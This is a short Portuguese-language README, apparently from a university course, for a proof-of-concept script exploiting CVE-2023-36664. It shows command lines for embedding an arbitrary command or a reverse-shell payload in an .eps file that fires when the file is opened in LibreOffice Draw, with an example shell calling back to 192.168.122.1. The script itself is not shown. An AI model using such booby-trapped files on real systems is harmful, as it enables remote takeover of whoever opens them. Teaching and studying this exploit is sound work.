
Prova de conceito desenvolvida para o CVE-2023-36664
Prova de conceito para o CVE-2023-36664.
Para inserir um payload num ficheiro .eps :
python3 poc.py -f "filename" --payload "command"
#python3 poc.py -f file.eps --payload firefox
Para inserir um payload de reverse shell num ficheiro .eps :
python3 poc.py -f "filename" --revshell --ip "ip" --port "port"
#python3 poc.py -f file.eps --revshell --ip 192.168.122.1 --port 1234
A abertura do ficheiro injetado no Libreoffice Draw deve acionar o payload.
Esta prova de conceito foi desenvolvida para um curso específico na universidade. É publicada aqui apenas para uso pedagógico.